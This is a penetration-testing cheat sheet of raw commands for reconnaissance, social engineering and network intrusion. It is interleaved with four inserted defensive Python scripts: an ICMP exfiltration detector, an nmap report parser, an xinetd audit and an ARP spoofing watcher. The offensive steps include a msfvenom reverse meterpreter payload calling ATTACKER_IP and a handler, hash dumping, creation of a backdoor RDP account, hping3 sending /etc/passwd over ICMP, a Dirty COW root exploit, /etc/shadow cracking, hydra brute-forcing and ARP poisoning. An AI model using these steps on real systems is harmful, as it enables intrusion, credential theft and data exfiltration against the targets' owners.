- OSINT
- Social Engineering
- External Network Pentesting
- Internal Network Pentesting
- Cool Paid Industry Tools
The whole framework.
- SubBrute:
subbrute.py example.com
nmap --script dns-brute example.com
dnsmap example.com
fierce -dns example.com
python3 sublist3r.py -d example.com -p 80 -e Bing
- urlcrazy:
urlcrazy -p example.com
- allintitle: restricts the results to those pages containing all the query terms specified in the title
- allintext: searches pages with content specified in search criteria
- inurl: restricts the results to those pages containing the word specified in the URL
- allinurl: restricts the results to those pages containing all the query terms specified in the URL
- link: searches websites or pages that contain links to the specified website or page
- info: finds information for the specified web page
- related: displays websites that are similar or related to the specified URL
- cache: displays Google's cached version of a web page, instead of the current version of the web page
- location: finds information for a specific location
- define: finds definitions of words, phrases, and acronyms
- filetype: allows searching based on a file extension
- id: an undocumented alias for info
- inanchor: restricts results to those pages containing the query terms specified in the anchor text on links to the page
- allinanchor: restricts results to those pages containing all query terms specified in the anchor text on links to the page
- author: restricts Google Groups results to include newsgroup articles by the specified author; the author can be a full or partial name or email address
- group: restricts Google Groups results to newsgroup articles from certain groups or subareas
- insubject: restricts articles in Google Groups to those that contain the specified terms
- intext: restricts results to documents containing the term in the text
- source: restricts results to articles from the news source with the specified ID
nmap -sn --script ip-geolocation-* example.com
- Gathering info on employees:
theharvester -d example.com -l 500 -b google -f result.html
(use -b linkedin for LinkedIn; -f writes the HTML report, -h would query Shodan instead)
- Searching for doc and pdf files:
metagoofil.py -d example.com -t doc,docx,pdf,xlsx,xls,ppt,pptx -l 100 -n 10 -o output -f result.html
- phishingfrenzy to enumerate search engines for emails
- haveibeenpwned
- pastebin
- pipl
- people finder
- TruePeopleSearch
- Check all common social media
dnsrecon -d example.com
dnsenum --enum example.com
dig example.com
(add +short to get only the IP)
dnsrecon -r 132.32.23.2-132.32.23.5
(reverse lookup on an IP range)
- Reverse IP/domain check
- DNS zone transfer:
dig ns example.com
dig @ns1.bluehost.com example.com. axfr
dnsrecon -t axfr -d example.com
traceroute ip
nmap --traceroute --script traceroute-geolocation example.com
- SmartDraw, Gliffy, etc. to draw the topological map
- Maltego
- fsociety (osint, password attacks, wireless testing, exploitation tools, sniffing, spoofing, web hacking, post exploitation)
- pentmenu (recon, dos, extraction)
- domains/subdomains
- location
- employees
- phone numbers, emails
- products/services
- network devices
- website directories
- public IP address block
- DNS records
Identify possible attack surfaces.
- Rules of Engagement (RoE)
- Be aware of local laws in the region before conducting SE
- Phishing
- Spear phishing
- Whaling
- Pharming
- Vishing
- SMSishing
- Piggybacking/Tailgating
- Eavesdropping
- Shoulder surfing
- Baiting/media dropping
- Dumpster diving
- Reverse social engineering
- Elicitation techniques
- Motivation techniques
- OhPhish
- BLACKEYE
- ShellPhishing
- Phishing Frenzy
- LUCY
- SET
- SpeedPhish Framework
- Gophish
- Name and employee ID
- Emails and passwords
- SSN
- Addresses, phone numbers
- PII, sensitive info
- Detect unnecessary open ports
- Firewall bypass testing
- IDS evasion testing
- Testing switching and routing issues
- OSINT
- Port scanning
- OS and service fingerprinting
- Vulnerability research
- Exploit verification
- Reporting
- Quick ping scan:
sudo nmap -sn 192.168.0.0/24
sudo netdiscover -i eth0 -p
(passive)
sudo netdiscover -i eth0 -r 192.168.0.0/24
(active)
- ICMP ping scan:
nmap -sP IP
- SYN scan:
nmap -sS -P0 IP
- All ports SYN scan:
nmap -sS -p- -P0 --max-rtt-timeout <time> IP
- Specific port SYN scan:
nmap -sS -p80,443 -P0 IP
- Fragmentation scan:
nmap -sS -A -f IP
- OS scan:
nmap -O -F IP
- Scan for patches:
sudo hping3 --scan known 192.168.0.7 -S
(known ports from /etc/services)
sudo hping3 --scan '0-3000' 192.168.0.7 -S
(scan a port range)
- Website info:
sudo whatweb example.com
- Wordpress scan (users):
sudo wpscan --url example.com --enumerate u
- Wordpress scan (themes):
sudo wpscan --url example.com --enumerate t
- Wordpress scan (plugins):
sudo wpscan --url example.com --enumerate p
- wmap inside msfconsole:
msfconsole
load wmap
wmap_sites -a example.com
(add a site)
wmap_targets -t IP_of_the_site
(add a target)
wmap_run -t
(load modules based on the site)
wmap_run -e
(run the assessment)
vulns
(display vulnerabilities)
- Nikto
- Vega
- Passive:
sudo p0f -i any -p -o /tmp/sniff.log
(-p for promiscuous)
sudo nmap -O IP
dmitry -pf IP
dmitry -pb IP
(-b for banner grab)
For any ASCII file to be sent over the network as ICMP:
- Listening window on the server:
sudo hping3 0.0.0.0 --listen signature --safe --icmp
- On the client to send to the server:
sudo hping3 IP --icmp -d 100 --sign signature --file /etc/passwd
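The detection side of the hping3 ICMP transfer above, as an added example that is not part of these notes: it parses raw ICMP echo datagrams, verifies the RFC 1071 checksum, and flags payloads that are mostly printable text rather than the timestamp-plus-byte-ramp padding a normal ping carries. The sample packets are constructed inline; "signature" and the file content are placeholders, and the padded sample mirrors what `-d 100` produces (text followed by NUL padding), which is why trailing NULs are stripped before the ratio is computed.

```python
import struct

def icmp_checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words (odd lengths are zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_echo(ident, seq, payload, icmp_type=8):
    """Build an ICMP echo (type 8 request / type 0 reply) with a valid checksum."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload

def parse_icmp(datagram):
    """Split an ICMP datagram into its fields; None if too short or the checksum fails."""
    if len(datagram) < 8:
        return None
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", datagram[:8])
    if icmp_checksum(datagram) != 0:  # a datagram with a correct checksum sums to zero
        return None
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq, "payload": datagram[8:]}

def printable_ratio(payload):
    """Fraction of bytes that are printable ASCII or whitespace."""
    if not payload:
        return 0.0
    return sum(32 <= b < 127 or b in b"\t\r\n" for b in payload) / len(payload)

def looks_like_data_transfer(datagram, min_len=32, text_threshold=0.9):
    """Flag echo packets whose (unpadded) payload is mostly text. Thresholds are
    assumptions for this example, not values from any tool."""
    pkt = parse_icmp(datagram)
    if pkt is None or pkt["type"] not in (0, 8):
        return False
    payload = pkt["payload"].rstrip(b"\x00")  # drop the padding -d adds after the data
    return len(payload) >= min_len and printable_ratio(payload) >= text_threshold

def scan(datagrams):
    """Return (id, seq) of every datagram that looks like a file transfer."""
    hits = []
    for d in datagrams:
        if looks_like_data_transfer(d):
            pkt = parse_icmp(d)
            hits.append((pkt["id"], pkt["seq"]))
    return hits

# Constructed samples: a Linux-style ping payload (8-byte timestamp + bytes 0x10..0x37),
# a packet carrying a signature followed by a text line, and the same text padded to 100 bytes.
TEXT_LINE = b"user1:x:1000:1000:Constructed User:/home/user1:/bin/bash\n"
NORMAL_PING = build_echo(0x1234, 1, b"\x00" * 8 + bytes(range(0x10, 0x38)))
SUSPECT_PING = build_echo(0x1234, 2, b"signature" + TEXT_LINE)
SUSPECT_PADDED = build_echo(0x1234, 3, (b"signature" + TEXT_LINE).ljust(100, b"\x00"))

if __name__ == "__main__":
    print(scan([NORMAL_PING, SUSPECT_PING, SUSPECT_PADDED]))
```

A fixed signature string is not what the check keys on, since the sender chooses it; the payload shape is the stable indicator, and a real deployment would feed `parse_icmp` from a capture rather than from the constructed samples.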
xsltproc -o ~/scanresults.html /usr/share/nmap/nmap.xsl scan.xml
- Host/IP
- OS
- Ports
- Services
- Vulnerabilities
- Exploit
- Notes
- Priority
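As an added example (not part of these notes), the Python script below reads nmap's `-oX` XML output with only the standard library and turns it into rows matching the report columns above (Host/IP, OS, Ports, Services), as an alternative to the xsltproc conversion; the Vulnerabilities, Exploit, Notes and Priority columns are left blank for the tester to fill in. The XML sample is constructed.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output, trimmed to the elements the parser uses.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -O -sV -oX scan.xml 192.168.0.7">
  <host>
    <status state="up"/>
    <address addr="192.168.0.7" addrtype="ipv4"/>
    <hostnames><hostname name="files.example.com" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.4"/>
      </port>
      <port protocol="tcp" portid="2049">
        <state state="open"/>
        <service name="nfs"/>
      </port>
      <port protocol="tcp" portid="79">
        <state state="closed"/>
        <service name="finger"/>
      </port>
    </ports>
    <os><osmatch name="Linux 3.2 - 4.9" accuracy="95"/></os>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.0.8" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

REPORT_COLUMNS = ("Host/IP", "OS", "Ports", "Services", "Vulnerabilities", "Exploit", "Notes", "Priority")

def parse_nmap_xml(xml_text):
    """Return one dict per host that is up: ip, hostname, best OS match, open ports."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # hosts that did not answer have nothing to report
        addr = host.find("address[@addrtype='ipv4']")
        hostname = host.find("hostnames/hostname")
        osmatch = host.find("os/osmatch")  # nmap lists the best match first
        ports = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # only reachable services go into the report
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            version = " ".join(v for v in (svc.get("product"), svc.get("version")) if v) if svc is not None else ""
            ports.append({"port": int(port.get("portid")), "proto": port.get("protocol"),
                          "service": name, "version": version})
        hosts.append({"ip": addr.get("addr") if addr is not None else "",
                      "hostname": hostname.get("name") if hostname is not None else "",
                      "os": osmatch.get("name") if osmatch is not None else "unknown",
                      "ports": ports})
    return hosts

def report_rows(hosts):
    """One row per open port, in the column order of REPORT_COLUMNS."""
    rows = []
    for h in hosts:
        for p in h["ports"]:
            service = f'{p["service"]} {p["version"]}'.strip()
            rows.append((h["ip"], h["os"], f'{p["port"]}/{p["proto"]}', service, "", "", "", ""))
    return rows

if __name__ == "__main__":
    print(" | ".join(REPORT_COLUMNS))
    for row in report_rows(parse_nmap_xml(SAMPLE_NMAP_XML)):
        print(" | ".join(row))
```

With a real scan, replace `SAMPLE_NMAP_XML` with the contents of the `scan.xml` produced by `-oX`; the closed finger port in the sample is skipped, which is the behaviour you want when the report tracks exposed services only.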
- Google Hacking DB
- National Vulnerability Database
- Exploit DB
- CVE
- Vulmon
searchsploit -t Windows Server 2008
searchsploit Windows Server 2008 | grep -i local
searchsploit Windows Server 2008 | grep -v kernel
nmap --script smb-os-discovery IP
nmap -sC IP
(default script scan)
- SMB exploit on Win 7 (eternalblue):
nmap --script=smb-os-discovery -p 445 IP
- Open msfconsole:
use auxiliary/scanner/smb/smb_ms17_010
set rhosts IP
set processinject lsass.exe
(optional)
run
nmap -T4 -A IP
- Focus on RPC, NFS, and mountd services.
rpcinfo -p IP
showmount -e IP
(discover NFS shares listed in /etc/exports)
sudo mount -t nfs 172.19.19.51:/home /mnt -o nolock
(-t specifies the type of the file system (nfs); nolock disables file locking)
- Try to access and remove files to confirm read/write.
- Check if Finger port is opened:
nmap -p 79 192.168.0.50
finger @192.168.0.50
finger Admin@192.168.0.50
- Alternatively, use telnet:
telnet 192.168.0.50 79
(type the username, e.g. Admin)
- Safeguard: disable the Finger service by editing the finger text file in /etc/xinetd.d
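A worked version of that safeguard, as an added example that is not part of these notes: the weak xinetd service file (finger enabled) beside the corrected one, and a small parser that reads xinetd service blocks and reports which services are still enabled. The file contents are constructed; the check assumes xinetd's default, where a service without `disable = yes` is enabled.

```python
import re

# Constructed /etc/xinetd.d/finger as found on a host that still serves finger.
FINGER_BEFORE = """service finger
{
    socket_type = stream
    wait        = no
    user        = nobody
    server      = /usr/sbin/in.fingerd
    disable     = no
}
"""

# The same file after the safeguard: disable = yes turns the service off.
FINGER_AFTER = FINGER_BEFORE.replace("disable     = no", "disable     = yes")

# xinetd attribute lines use '=', '+=' or '-=' between key and value.
ATTR_RE = re.compile(r"^(\w+)\s*([+-]?=)\s*(.*)$")

def parse_xinetd(text):
    """Return {service_name: {attribute: value}} for every service block in text."""
    services = {}
    for block in re.finditer(r"service\s+(\S+)\s*\{(.*?)\}", text, re.S):
        name, body = block.group(1), block.group(2)
        attrs = {}
        for line in body.splitlines():
            line = line.split("#", 1)[0].strip()  # drop comments and blank lines
            m = ATTR_RE.match(line)
            if m:
                attrs[m.group(1)] = m.group(3).strip()
        services[name] = attrs
    return services

def enabled_services(text):
    """Names of services whose block lacks 'disable = yes' (assumed xinetd default)."""
    return [name for name, attrs in parse_xinetd(text).items()
            if attrs.get("disable", "no").lower() != "yes"]

def audit_files(files):
    """Given {path: contents}, return the paths that still enable a service."""
    return [path for path, text in files.items() if enabled_services(text)]

if __name__ == "__main__":
    print(audit_files({"/etc/xinetd.d/finger": FINGER_BEFORE}))  # still enabled
    print(audit_files({"/etc/xinetd.d/finger": FINGER_AFTER}))   # nothing to report
```

To run it against a host, read each file under /etc/xinetd.d into the dict passed to `audit_files`; restarting xinetd after the edit is still required for the change to take effect.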
sudo service postgresql start
sudo msfdb init
sudo msfconsole
workspace -h
- Create a workspace:
workspace -a LPT
db_nmap -sP IP
- Type services or hosts to examine the scan results from the workspace; hosts -h lists all available options
use auxiliary/scanner/portscan/tcp
hosts -c address,os_flavor -S Linux -R
(-R inputs the hosts into the aux scanner's RHOSTS)
run
- Open Cain & Abel
- Configure Ethernet
- Select Sniffer and pick the Ethernet adapter
- Start sniffing
- In the Sniffer tab, Plus (+) icon (or) right click in the window, select Scan MAC Addresses to scan the network for hosts
- Select ARP (bottom-left corner) after getting the MAC addresses
- Click (+) to add a new ARP poison route
- Select two IPs that communicate (like FTP server and Ads Dept)
- Start ARP
- Check Passwords tab (bottom-left corner)
- Install L0phtCrack on Windows
- Run it and extract passwords from weak NTLM hashes
hydra -L /root/Wordlists/Usernames.txt -P /root/Wordlists/Passwords.txt ftp://IP
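The defender's view of the Cain & Abel ARP poisoning steps above, as an added example that is not part of these notes: a parser for raw Ethernet/ARP frames and a watcher that learns the IP-to-MAC binding from the first reply it sees and reports any later reply that rebinds a known IP to a different MAC, which is what a poisoned route between two hosts looks like on the wire (the same idea tools such as arpwatch implement). The frames and addresses are constructed.

```python
import struct

def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))

def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame (EtherType 0x0806) carrying an ARP reply (opcode 2)."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + b"\x08\x06"
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + mac_bytes(target_mac) + ip_bytes(target_ip))
    return eth + arp

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) for an IPv4-over-Ethernet ARP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if htype != 1 or ptype != 0x0800 or hlen != 6 or plen != 4:
        return None
    sender_mac = ":".join("%02x" % b for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return opcode, sender_mac, sender_ip

class ArpWatch:
    """Track which MAC answers for each IP and record changes."""
    def __init__(self):
        self.table = {}   # ip -> mac learned from the first reply seen
        self.alerts = []  # (ip, previously seen mac, new mac)

    def feed(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return
        opcode, mac, ip = parsed
        if opcode != 2:
            return  # only replies bind an address; requests are ignored here
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac
        elif known != mac:
            self.alerts.append((ip, known, mac))

def detect(frames):
    """Run every frame through one ArpWatch and return the alerts it raised."""
    watch = ArpWatch()
    for frame in frames:
        watch.feed(frame)
    return watch.alerts

# Constructed traffic: the FTP server and a workstation answer for their own IPs,
# then a third machine claims both addresses, as in a two-way poison between them.
FTP_MAC, WS_MAC, ROGUE_MAC = "00:11:22:33:44:01", "00:11:22:33:44:02", "aa:aa:aa:aa:aa:aa"
FRAMES = [
    build_arp_reply(FTP_MAC, "10.0.0.5", WS_MAC, "10.0.0.20"),
    build_arp_reply(WS_MAC, "10.0.0.20", FTP_MAC, "10.0.0.5"),
    build_arp_reply(ROGUE_MAC, "10.0.0.5", WS_MAC, "10.0.0.20"),
    build_arp_reply(ROGUE_MAC, "10.0.0.20", FTP_MAC, "10.0.0.5"),
]

if __name__ == "__main__":
    for ip, old, new in detect(FRAMES):
        print(f"ARP binding for {ip} changed from {old} to {new}")
```

The first-seen binding is trusted here, so a watcher started after a poison is in place would learn the wrong MAC; in practice the table is seeded from DHCP leases or a known inventory, and a change alert is correlated with the switch's MAC table.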
- OpenVAS for vulnerability scanning
- Searchsploit:
searchsploit openssl remote
- Copy metasploit modules to the appropriate folder, e.g.
/usr/share/metasploit-framework/modules/exploits/multi/http
reload_all
(inside of msfconsole)
search new_exploit_name
- Villain: a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=ATTACKER_IP lport=443 -f exe > /home/pentester/Desktop/shikata.exe
(reverse meterpreter shell)
service apache2 start
(for sharing files with remote users)
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share/
cp /home/pentester/Desktop/shikata.exe /var/www/html/share
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost ATTACKER_IP
set lport 443
exploit
getsystem
run post/windows/gather/hashdump
run getgui -e
(enables the remote desktop connection to the machine)
run getgui -u POPS -p frasporD@123
(create a user POPS)
xfreerdp /u:POPS /p:frasporD@123 /v:TARGET_IP
To crack the hashes, use JohnTheRipper (run export CPUID_DISABLE=1 before using john) or hashcat:
sudo john --format=nt /home/pentester/Desktop/hashes.txt
- Brute force SSH:
hydra -L /home/pentester/Wordlists/Usernames.txt -P /home/pentester/Wordlists/Passwords.txt TARGET_IP ssh
- Connect to the target machine and run
uname -a
lsb_release -a
(to get Linux distro info and version)
- Test if you can switch to root:
sudo su
searchsploit dirty cow
- Copy the exploit to the root folder:
searchsploit -m linux/local/40847.cpp
- Copy the contents of the file into a file on the target machine
- Compile the code:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow -s
cat /etc/passwd
(save the content into a file for cracking password hashes)
cat /etc/shadow
(save this to another file)
unshadow password.txt shadow.txt > unshadowed.txt
export CPUID_DISABLE=1
sudo john unshadowed.txt
- Identify internal domains:
net view /domain
- List of files/print shares:
net view \\computername
- List of files/print shares including hidden:
net view \\computername /all
- List of shares on a Netware PC:
net view /network:nw
- Find the domain name:
systeminfo | findstr /B /C:"Domain"
- Find the logged in user's domain:
echo %userdomain%
- WMIC to find the domain:
wmic computersystem get domain
- List all available servers on the domain:
net view /domain:[domain name]
arp -a
ipconfig
nmap
- Soft Perfect Network Scanner
- MyLanViewer
- SolarWinds IP Network Browser
- Active mode:
netdiscover -r 10.0.0.0/24
- Passive mode:
netdiscover -p -r 10.0.0.0/24
- Bettercap
- Bruteratel: a customized C2 for red team and adversary simulation
- CobaltStrike: adversary simulation and red team operations